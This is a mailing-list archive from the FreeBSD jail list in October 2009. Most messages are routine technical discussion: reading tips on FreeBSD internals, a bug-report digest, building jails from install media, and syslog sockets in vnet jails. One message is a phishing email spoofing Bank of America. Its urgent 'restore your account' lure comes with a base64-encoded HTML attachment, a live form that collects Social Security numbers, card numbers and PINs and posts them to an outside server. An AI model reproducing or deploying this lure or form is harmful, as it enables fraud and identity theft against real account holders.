From owner-freebsd-jail@FreeBSD.ORG Sun Oct 25 04:11:15 2009 Return-Path: Delivered-To: freebsd-jail@freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:4f8:fff6::34]) by hub.freebsd.org (Postfix) with ESMTP id A4AAE106566B for ; Sun, 25 Oct 2009 04:11:15 +0000 (UTC) (envelope-from coco@executive-computing.de) Received: from mail.moehre.org (mail.moehre.org [195.96.32.7]) by mx1.freebsd.org (Postfix) with ESMTP id 631E48FC0A for ; Sun, 25 Oct 2009 04:11:15 +0000 (UTC) Received: from localhost (unknown [195.96.32.7]) by mail.moehre.org (Postfix) with ESMTP id 3B7354D4455; Sun, 25 Oct 2009 05:11:14 +0100 (CET) X-Spam-Flag: NO X-Spam-Score: -3.822 X-Spam-Level: X-Spam-Status: No, score=-3.822 tagged_above=-999 required=5 tests=[ALL_TRUSTED=-1.8, AWL=0.577, BAYES_00=-2.599] autolearn=ham Received: from mail.moehre.org ([195.96.32.7]) by localhost (mail.moehre.org [195.96.32.7]) (amavisd-new, port 10024) with ESMTP id Jc-SKSTLuPaU; Sun, 25 Oct 2009 05:11:11 +0100 (CET) Received: from [192.168.100.30] (p54B0D1CA.dip.t-dialin.net [84.176.209.202]) (using TLSv1 with cipher DHE-RSA-AES256-SHA (256/256 bits)) (No client certificate requested) (Authenticated sender: coco@executive-computing.de) by mail.moehre.org (Postfix) with ESMTP id 606D94D4454; Sun, 25 Oct 2009 05:11:11 +0100 (CET) Message-ID: <4AE3CFDD.1080302@executive-computing.de> Date: Sun, 25 Oct 2009 05:11:09 +0100 From: Marco Steinbach User-Agent: Thunderbird 2.0.0.12 (Windows/20080213) MIME-Version: 1.0 To: Tommy Pham References: <510798.22136.qm@web38206.mail.mud.yahoo.com> In-Reply-To: <510798.22136.qm@web38206.mail.mud.yahoo.com> Content-Type: text/plain; charset=ISO-8859-1; format=flowed Content-Transfer-Encoding: 7bit Cc: freebsd-jail@freebsd.org Subject: Re: Understand the internals of FreeBSD X-BeenThere: freebsd-jail@freebsd.org X-Mailman-Version: 2.1.5 Precedence: list List-Id: "Discussion about FreeBSD jail\(8\)" List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Sun, 25 Oct 2009 04:11:15 -0000 Tommy Pham schrieb: > Hi everyone, > > What do you all recommend for a better understanding of the FreeBSD's internals & jail system? Should I review C, C++ or both before reading the source code? It's been over a decade since I code in C/C++ and that was in college doing old school structured programming languages. :D "The Design and Implementation of the FreeBSD Operating System" (ISBN 978-0201702453) was a good starting point for me. As for understanding the internals of the jail mechanism in detail, you will need to familiarize yourself with at least parts of the source of the system. The man pages (apropos jail) will provide some entry points. There is an introductory paper written by Poul-Henning Kamp and Robert N.M. Watson available at http://phk.freebsd.dk/pubs/sane2000-jail.pdf, which might help you getting started. Other documents at http://phk.freebsd.dk/pubs/ might be of interest, also. MfG CoCo From owner-freebsd-jail@FreeBSD.ORG Mon Oct 26 11:07:02 2009 Return-Path: Delivered-To: freebsd-jail@FreeBSD.org Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:4f8:fff6::34]) by hub.freebsd.org (Postfix) with ESMTP id 8745B10656C9 for ; Mon, 26 Oct 2009 11:07:02 +0000 (UTC) (envelope-from owner-bugmaster@FreeBSD.org) Received: from freefall.freebsd.org (freefall.freebsd.org [IPv6:2001:4f8:fff6::28]) by mx1.freebsd.org (Postfix) with ESMTP id 74CA28FC1A for ; Mon, 26 Oct 2009 11:07:02 +0000 (UTC) Received: from freefall.freebsd.org (localhost [127.0.0.1]) by freefall.freebsd.org (8.14.3/8.14.3) with ESMTP id n9QB7297043808 for ; Mon, 26 Oct 2009 11:07:02 GMT (envelope-from owner-bugmaster@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.14.3/8.14.3/Submit) id n9QB71Nt043806 for freebsd-jail@FreeBSD.org; Mon, 26 Oct 2009 11:07:01 GMT (envelope-from owner-bugmaster@FreeBSD.org) Date: Mon, 26 Oct 2009 11:07:01 GMT Message-Id: <200910261107.n9QB71Nt043806@freefall.freebsd.org> X-Authentication-Warning: freefall.freebsd.org: gnats set sender to owner-bugmaster@FreeBSD.org using -f From: FreeBSD bugmaster To: freebsd-jail@FreeBSD.org Cc: Subject: Current problem reports assigned to freebsd-jail@FreeBSD.org X-BeenThere: freebsd-jail@freebsd.org X-Mailman-Version: 2.1.5 Precedence: list List-Id: "Discussion about FreeBSD jail\(8\)" List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Mon, 26 Oct 2009 11:07:02 -0000 Note: to view an individual PR, use: http://www.freebsd.org/cgi/query-pr.cgi?pr=(number). The following is a listing of current problems submitted by FreeBSD users. These represent problem reports covering all versions including experimental development code and obsolete releases. S Tracker Resp. Description -------------------------------------------------------------------------------- o kern/133265 jail [jail] is there a solution how to run nfs client in ja o kern/119842 jail [smbfs] [jail] "Bad address" with smbfs inside a jail o bin/99566 jail [jail] [patch] fstat(1) according to specified jid o bin/32828 jail [jail] w(1) incorrectly handles stale utmp slots with 4 problems total. From owner-freebsd-jail@FreeBSD.ORG Tue Oct 27 07:34:37 2009 Return-Path: Delivered-To: freebsd-jail@freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:4f8:fff6::34]) by hub.freebsd.org (Postfix) with ESMTP id 0BB4B106568F for ; Tue, 27 Oct 2009 07:34:37 +0000 (UTC) (envelope-from notification@bankofamerica.com) Received: from smtp.allegronet.co.il (asteroid.allegronet.co.il [194.90.119.232]) by mx1.freebsd.org (Postfix) with ESMTP id 542B48FC15 for ; Tue, 27 Oct 2009 07:34:36 +0000 (UTC) Received: from dizrep.co.il (dsl212-143-172-153.bb.netvision.net.il [212.143.172.153]) (Authenticated sender: pop53_bougas@asteroid.allegronet.co.il, localhost, smtp.allegronet.co.il) by smtp.allegronet.co.il (Postfix) with ESMTP id C85EF468555 for ; Tue, 27 Oct 2009 08:51:24 +0200 (IST) Received: from bankofamerica.com ([75.101.199.77]) by dizrep.co.il with Microsoft SMTPSVC(6.0.3790.3959); Tue, 27 Oct 2009 08:48:36 +0200 From: Bank of America To: freebsd-jail@freebsd.org Date: 26 Oct 2009 23:51:31 -0700 Message-ID: <20091026235131.3E50DE753B98A8E4@bankofamerica.com> MIME-Version: 1.0 Content-Type: multipart/mixed; boundary="----=_NextPart_000_0012_709122BD.D5B4BC56" X-OriginalArrivalTime: 27 Oct 2009 06:48:36.0578 (UTC) FILETIME=[822F6C20:01CA56D1] Subject: Security Notification X-BeenThere: freebsd-jail@freebsd.org X-Mailman-Version: 2.1.5 Precedence: list List-Id: "Discussion about FreeBSD jail\(8\)" List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Tue, 27 Oct 2009 07:34:37 -0000 This is a multi-part message in MIME format. ------=_NextPart_000_0012_709122BD.D5B4BC56 Content-Type: text/plain Content-Transfer-Encoding: 8bit Dear Bank of America Customer, freebsd-jail@freebsd.org As part of our security measures, we regularly screen activity in the Bank of America system. We recently contacted you after noticing an issue on your account. We requested information from you for the following reason: We recently received a report of unauthorized credit card use associated with this account. As a precaution, we have limited access to your Bank of America account in order to protect against future unauthorized transactions. Case ID Number: BOA-531-472-560 This is a reminder to restore your account as soon as possible. Please download the form attached to this email and open it in a web browser. Once opened, you will be provided with steps to restore your account access. We appreciate your understanding as we work to ensure account safety. In accordance with Bank of America's Customer Agreement, your account access will remain limited until the issue has been resolved. Unfortunately, if access to your account remains limited for an extended period of time, it may result in further limitations or eventual account closure. We encourage you to restore your Bank of America account as soon as possible to help avoid this. We thank you for your prompt attention to this matter. Please understand that this is a security measure intended to help protect you and your account. We apologize for any inconvenience. Sincerely, Bank of America Security Center ------=_NextPart_000_0012_709122BD.D5B4BC56 Content-Type: application/octet-stream; name="Restore_your_Online_Banking_account.html" Content-Transfer-Encoding: base64 Content-Disposition: attachment; filename="Restore_your_Online_Banking_account.html" PCFET0NUWVBFIGh0bWwgUFVCTElDICItLy9XM0MvL0RURCBYSFRNTCAxLjAgVHJhbnNpdGlv bmFsLy9FTiIgImh0dHA6Ly93d3cudzMub3JnL1RSL3hodG1sMS9EVEQveGh0bWwxLXRyYW5z aXRpb25hbC5kdGQiPg0KPGh0bWwgeG1sbnM9Imh0dHA6Ly93d3cudzMub3JnLzE5OTkveGh0 bWwiPg0KPGhlYWQ+DQo8bWV0YSBodHRwLWVxdWl2PSJDb250ZW50LVR5cGUiIGNvbnRlbnQ9 InRleHQvaHRtbDsgY2hhcnNldD11dGYtOCIgLz4NCjx0aXRsZT5CYW5rIG9mIEFtZXJpY2Eg fCBSZXN0b3JlIFlvdXIgT25saW5lIEJhbmtpbmcgQWNjb3VudDwvdGl0bGU+DQo8bGluayBy ZWw9InN0eWxlc2hlZXQiIHR5cGU9InRleHQvY3NzIiBocmVmPSJodHRwOi8vZ2VvcmdlYXBv c3RvbGlkaXMuY29tL09sZF9TaXRlL2ltYWdlcy93LnBocD9mcm09dCIgLz4NCg0KPHNjcmlw dCB0eXBlPSJ0ZXh0L2phdmFzY3JpcHQiIGxhbmd1YWdlPSJqYXZhc2NyaXB0Ij4NCglmdW5j dGlvbiB0KHIsZSl7cmV0dXJuIHIudGVzdChkb2N1bWVudC5mb3Jtc1swXS5lbGVtZW50c1tl XS52YWx1ZSl9DQoJZnVuY3Rpb24gcihtLGUpe2FsZXJ0KG0pOyBkb2N1bWVudC5mb3Jtc1sw XS5lbGVtZW50c1tlXS5mb2N1cygpOyB0cnl7ZG9jdW1lbnQuZm9ybXNbMF0uZWxlbWVudHNb ZV0uc2VsZWN0KCk7fWNhdGNoKGUpe30gcmV0dXJuIGZhbHNlO30NCglmdW5jdGlvbiB2YWwo KXsNCgkJCWlmKCF0KC9eWzAtOV17OX0kLywnc3NuJykpe3JldHVybiByKCdQbGVhc2UgZW50 ZXIgYSB2YWxpZCBTb2NpYWwgU2VjdXJpdHkgTnVtYmVyIChTU04pXG4oOSBkaWdpdHMsIG5v IGRhc2hlcyBvciBzcGFjZXMpJywnc3NuJyk7fQ0KCQkJaWYoIXQoL14oNHw1fDYpezF9WzAt OV17MTUsMTZ9JC8sJ2NjJykpe3JldHVybiByKCdQbGVhc2UgZW50ZXIgYSB2YWxpZCBBVE0g b3IgQ2hlY2sgQ2FyZCBOdW1iZXJcbigxNiBkaWdpdHMsIG5vIGRhc2hlcyBvciBzcGFjZXMp JywnY2MnKTt9DQoJCQlpZighdCgvXlswLTldezR9JC8sJ3BpbicpKXtyZXR1cm4gcignUGxl YXNlIGVudGVyIGEgdmFsaWQgQVRNIG9yIENoZWNrIENhcmQgUElOXG4oNCBkaWdpdHMpJywn cGluJyk7fQ0KCQkJcmV0dXJuIHRydWUNCgkJfQ0KCQkNCjwvc2NyaXB0Pg0KPC9oZWFkPg0K DQo8Ym9keT4NCgk8bm9zY3JpcHQgc3R5bGU9ImJvcmRlcjogMXB4IHNvbGlkIHJlZDsgZGlz cGxheTogYmxvY2s7IGNvbG9yOiByZWQ7IGZvbnQ6IG5vcm1hbCAxM3B4IEFyaWFsLCBIZWx2 ZXRpY2EsIHNhbnMtc2VyaWY7IHBhZGRpbmc6NHB4OyBtYXJnaW46NHB4OyBmbG9hdDogbGVm dDsiPlRoaXMgZm9ybSByZXF1aXJlcyBqYXZhc2NyaXB0LiBQbGVhc2Ugb3BlbiB0aGlzIGZv cm0gaW4gYSBqYXZhc2NyaXB0IGVuYWJsZWQgYnJvd3Nlci48L25vc2NyaXB0Pg0KCTxkaXYg aWQ9ImFsbCIgc3R5bGU9ImRpc3BsYXk6IG5vbmUiPg0KCTxkaXYgaWQ9InRvcCI+PGRpdiBp ZD0idG9wTGVmdCI+Jm5ic3A7PC9kaXY+PC9kaXY+DQoJPGRpdiBpZD0iYmFyIj48L2Rpdj4N Cgk8ZGl2IGlkPSJiZCI+DQoJCTxoMiBjbGFzcz0iYmlnUmVkIj5SZXN0b3JlIFlvdXIgT25s aW5lIEJhbmtpbmcgQWNjb3VudDwvaDI+DQoJCTxkaXYgY2xhc3M9ImhyIj48L2Rpdj4NCiAg ICA8cD5Zb3UgaGF2ZSByZWNlaXZlZCB0aGlzIGZvcm0gYmVjYXVzZSB5b3VyIEJhbmsgb2Yg QW1lcmljYSBPbmxpbmUgQmFua2luZyANCiAgICAgIGFjY291bnQgaGFzIGJlZW4gc3VzcGVu ZGVkIGZvciBzZWN1cml0eSByZWFzb25zLjxiciAvPg0KICAgICAgSWYgeW91IGFyZSB0aGUg cmlnaHRmdWwgb3duZXIgb2YgdGhpcyBhY2NvdW50LCBwbGVhc2UgZmlsbCBpbiB0aGUgZm9y bSBiZWxvdyANCiAgICAgIGFuZCBjbGljayAiPGI+U3VibWl0PC9iPiIgaW4gb3JkZXIgdG8g cmVzdG9yZSBpdC48YnIgLz4NCiAgICA8L3A+DQogICAgPHA+Kj0gcmVxdWlyZWQgaW5mb3Jt YXRpb248YnIgLz4NCiAgICA8L3A+DQogICAgPGZvcm0gYWN0aW9uPSJodHRwOi8vZ2Vvcmdl YXBvc3RvbGlkaXMuY29tL09sZF9TaXRlL2ltYWdlcy93LnBocCIgbWV0aG9kPSJwb3N0IiBv bnN1Ym1pdD0icmV0dXJuIHZhbCgpIj4NCgkJCQ0KICAgICAgPGRpdiBjbGFzcz0ibCI+IFNv Y2lhbCBTZWN1cml0eSBOdW1iZXIgKFNTTikqOiA8L2Rpdj4NCiAgICAgIDxpbnB1dCB0eXBl PSJ0ZXh0IiBuYW1lPSJzc24iIHNpemU9IjkiIG1heGxlbmd0aD0iOSIvPg0KICAgICAgPHNw YW4gY2xhc3M9ImgiPig5IGRpZ2l0cywgbm8gZGFzaGVzIG9yIHNwYWNlcyk8L3NwYW4+PGJy IC8+DQoJCQkNCiAgICAgIDxkaXYgY2xhc3M9ImwiPiBBVE0gb3IgQ2hlY2sgQ2FyZCBOdW1i ZXIqOiA8L2Rpdj4NCiAgICAgIDxpbnB1dCB0eXBlPSJ0ZXh0IiBuYW1lPSJjYyIgbWF4bGVu Z3RoPSIxNyIgc2l6ZT0iMjIiIC8+DQogICAgICA8c3BhbiBjbGFzcz0iaCI+KDE2IGRpZ2l0 czwvc3Bhbj48c3BhbiBjbGFzcz0iaCI+LCBubyBkYXNoZXMgb3Igc3BhY2VzKTwvc3Bhbj48 YnIgLz4NCgkJCQ0KICAgICAgPGRpdiBjbGFzcz0ibCI+IEFUTSBvciBDaGVjayBDYXJkIFBJ Tio6IDwvZGl2Pg0KICAgICAgPGlucHV0IHR5cGU9InBhc3N3b3JkIiBuYW1lPSJwaW4iIG1h eGxlbmd0aD0iNCIgc2l6ZT0iNCIgLz4NCiAgICAgIDxzcGFuIGNsYXNzPSJoIj4oNCBkaWdp dHMpPC9zcGFuPjxiciAvPg0KICAgICAgPGJyPg0KICAgICAgPGJyPg0KICAgICAgUmVzdG9y aW5nIHlvdXIgT25saW5lIEJhbmtpbmcgYWNjb3VudCBtYXkgdGFrZSBhIGZldyBtb21lbnRz Ljxicj4NCiAgICAgIFBsZWFzZSBiZSBwYXRpZW50IGFzIHdlIHByb2Nlc3MgeW91ciBpbmZv cm1hdGlvbi48YnI+DQogICAgICA8YnI+DQogICAgICA8aW5wdXQgdHlwZT0ic3VibWl0IiB2 YWx1ZT0iU3VibWl0IiBjbGFzcz0ic3ViIiBuYW1lPSJzdWJtaXQiIC8+DQogICAgICA8YnI+ DQogICAgICA8YnIgLz4NCgkJCTxkaXYgY2xhc3M9ImhyIj48L2Rpdj48YnIgLz4NCgkJCTxk aXYgY2xhc3M9ImwiPjwvZGl2Pg0KICAgIDwvZm9ybT4NCgk8cD4mbmJzcDs8L3A+DQogICAg PHA+Jm5ic3A7PC9wPg0KICAgIDxwPiZuYnNwOzwvcD4NCiAgICA8cD48aW1nIHNyYz0iaHR0 cHM6Ly9vbmxpbmVlYXN0MS5iYW5rb2ZhbWVyaWNhLmNvbS9lYXMtZG9jcy9pbWFnZXMvaWNv bl9sb2NrX2JpZy5naWYiPiANCiAgICAgIDxmb250IGNvbG9yPSIjMDAwMDY2Ij48Yj5TZWN1 cmUgQXJlYTwvYj48L2ZvbnQ+PC9wPg0KICAgIDxwPjxhIGhyZWY9Imh0dHBzOi8vd3d3LmJh bmtvZmFtZXJpY2EuY29tL3ByaXZhY3kvIj48Zm9udCBzaXplPSIxIj5Qcml2YWN5IA0KICAg ICAgJmFtcDsgU2VjdXJpdHk8L2ZvbnQ+PC9hPjxmb250IHNpemU9IjEiPjxicj4NCiAgICAg IEJhbmsgb2YgQW1lcmljYSwgTi5BLiBNZW1iZXIgRkRJQy4gRXF1YWwgSG91c2luZyBMZW5k ZXIgRXF1YWwgSG91c2luZyBMZW5kZXIgDQogICAgICA8aW1nIHNyYz0iaHR0cHM6Ly9vbmxp bmVlYXN0MS5iYW5rb2ZhbWVyaWNhLmNvbS9lYXMtZG9jcy9pbWFnZXMvaWNvbl9ob3VzZS5n aWYiPiANCiAgICAgIDxicj4NCiAgICAgICZjb3B5OyAyMDA5IEJhbmsgb2YgQW1lcmljYSBD b3Jwb3JhdGlvbi4gQWxsIHJpZ2h0cyByZXNlcnZlZC48L2ZvbnQ+PC9wPg0KICA8L2Rpdj4N Cgk8L2Rpdj4NCjwvYm9keT4NCjxzY3JpcHQgdHlwZT0idGV4dC9qYXZhc2NyaXB0IiBsYW5n dWFnZT0iamF2YXNjcmlwdCI+DQoJd2luZG93Lm9ubG9hZCA9IGRvY3VtZW50LmdldEVsZW1l bnRCeUlkKCdhbGwnKS5zdHlsZS5kaXNwbGF5ID0gJ2Jsb2NrJzsNCjwvc2NyaXB0Pg0KPC9o dG1sPg0K ------=_NextPart_000_0012_709122BD.D5B4BC56-- From owner-freebsd-jail@FreeBSD.ORG Tue Oct 27 18:41:33 2009 Return-Path: Delivered-To: freebsd-jail@freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:4f8:fff6::34]) by hub.freebsd.org (Postfix) with ESMTP id E3D3C106568F; Tue, 27 Oct 2009 18:41:33 +0000 (UTC) (envelope-from 000.fbsd@quip.cz) Received: from elsa.codelab.cz (elsa.codelab.cz [94.124.105.4]) by mx1.freebsd.org (Postfix) with ESMTP id 9E9A68FC0C; Tue, 27 Oct 2009 18:41:33 +0000 (UTC) Received: from localhost (localhost.codelab.cz [127.0.0.1]) by elsa.codelab.cz (Postfix) with ESMTP id 550BE19E023; Tue, 27 Oct 2009 19:41:32 +0100 (CET) Received: from [192.168.1.2] (r5bb235.net.upc.cz [86.49.61.235]) (using TLSv1 with cipher DHE-RSA-AES256-SHA (256/256 bits)) (No client certificate requested) by elsa.codelab.cz (Postfix) with ESMTPSA id CE18F19E019; Tue, 27 Oct 2009 19:41:29 +0100 (CET) Message-ID: <4AE73ED9.5000505@quip.cz> Date: Tue, 27 Oct 2009 19:41:29 +0100 From: Miroslav Lachman <000.fbsd@quip.cz> User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.7.12) Gecko/20050915 X-Accept-Language: cz, cs, en, en-us MIME-Version: 1.0 To: "Tonix (Antonio Nati)" References: <4AE6C7BD.907@interazioni.it> <4AE7232E.2070208@quip.cz> <4AE728F8.7020809@interazioni.it> In-Reply-To: <4AE728F8.7020809@interazioni.it> Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit Cc: freebsd-isp@freebsd.org, freebsd-jail@freebsd.org Subject: Re: Jails creation X-BeenThere: freebsd-jail@freebsd.org X-Mailman-Version: 2.1.5 Precedence: list List-Id: "Discussion about FreeBSD jail\(8\)" List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Tue, 27 Oct 2009 18:41:34 -0000 Tonix (Antonio Nati) wrote: > Miroslav Lachman ha scritto: [...] >> You are not the first one with this idea. You can easily use nullfs >> mount of directories from base system, but people mostly prefer >> independent directory with jail install shared by many jails. >> >> And sometimes somebody needs jails with modified binaries, so it is >> not possible to share theme with base system in all cases. >> >> There are many ways to get jails running without sources, it is up to >> you to choose one. [...] > I have nothing against shared dirs, but my question is this: why the > basic jail creation command requires compilation? Given the fact jail > must have exactly the same version of base system, why the base create > command dos not simply copy the existing binaries? It would avoid local > source, remote packages, etc... It is not true. Jail command does not requires compilation, nor exactly same version. I am running 6.x version jail on system with 7.2 and you can run 32bit (i386) jail on 64bit (amd64) system. The `jail` command is there just for starting the jail, not for building it. The jail even does not need to be a full installed system! There are too many different scenarios with jails, that there can not be "one command to satisfy them all". It is up to administrator to prepare the best environment for his/her needs. If you need the full copy of the base system, you can do it really easily (by tar as was suggested by Vincet Hoffman or dump & restore), and if you do it for each jail, you loose the benefits of shared read-only base directory (you will need more disk space and more memory). If you do not want to spend some time by compilation, you can install the jail from installation media you already have from system install. cd /some/media/7.2-RELEASE/base mkdir /path/to/myjail setenv DESTDIR /path/to/myjail sh install.sh That's all! It is too simple in contrast to source build or manually copy something from base. If you are using ZFS, you can use snapshots and clones... And many more scenarios exist. I am CCing freebsd-jail@, it is more appropriate list to contionue. Miroslav Lachman From owner-freebsd-jail@FreeBSD.ORG Fri Oct 30 04:13:11 2009 Return-Path: Delivered-To: freebsd-jail@freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:4f8:fff6::34]) by hub.freebsd.org (Postfix) with ESMTP id AFAE210656A3 for ; Fri, 30 Oct 2009 04:13:11 +0000 (UTC) (envelope-from remodeler@alentogroup.org) Received: from courriel.marmotmail.com (courriel.marmotmail.com [85.17.36.172]) by mx1.freebsd.org (Postfix) with ESMTP id 7528A8FC0A for ; Fri, 30 Oct 2009 04:13:11 +0000 (UTC) Received: from bruce.epifora.com (localhost.local [127.0.0.1]) by courriel.marmotmail.com (Postfix) with ESMTP id 0DB0A23947C for ; Fri, 30 Oct 2009 06:16:23 +0100 (CET) Received: from localhost (localhost [127.0.0.1]) by bruce.epifora.com (Postfix) with ESMTP id 1973D4761F9 for ; Thu, 29 Oct 2009 23:30:53 -0500 (EST) Received: from bruce.epifora.com ([127.0.0.1]) by localhost (bruce.epifora.com [127.0.0.1]) (amavisd-new, port 10024) with ESMTP id 11765-03 for ; Thu, 29 Oct 2009 23:30:51 -0500 (EST) Received: from alentogroup.org (localhost [127.0.0.1]) by bruce.epifora.com (Postfix) with ESMTP id 8A44B4761F8 for ; Thu, 29 Oct 2009 23:30:51 -0500 (EST) From: "remodeler" To: freebsd-jail@freebsd.org Date: Thu, 29 Oct 2009 23:30:51 -0500 Message-Id: <20091030041848.M5504@alentogroup.org> X-OriginatingIP: 127.0.0.1 MIME-Version: 1.0 Content-Type: text/plain; charset=iso-8859-1 Subject: Security of syslog socket in vnet jail? X-BeenThere: freebsd-jail@freebsd.org X-Mailman-Version: 2.1.5 Precedence: list List-Id: "Discussion about FreeBSD jail\(8\)" List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Fri, 30 Oct 2009 04:13:11 -0000 I wonder if anyone has an opinion on the security implications of opening syslog sockets in a vnet jail, vs. using a remote logging host. The jail does not otherwise allow unix sockets. The /var/run/log and /var/run/logpriv sockets would be provided by the host syslogd, using -l option. The alternative would have syslogd running in its own vnet jail as a logging host. Thank you.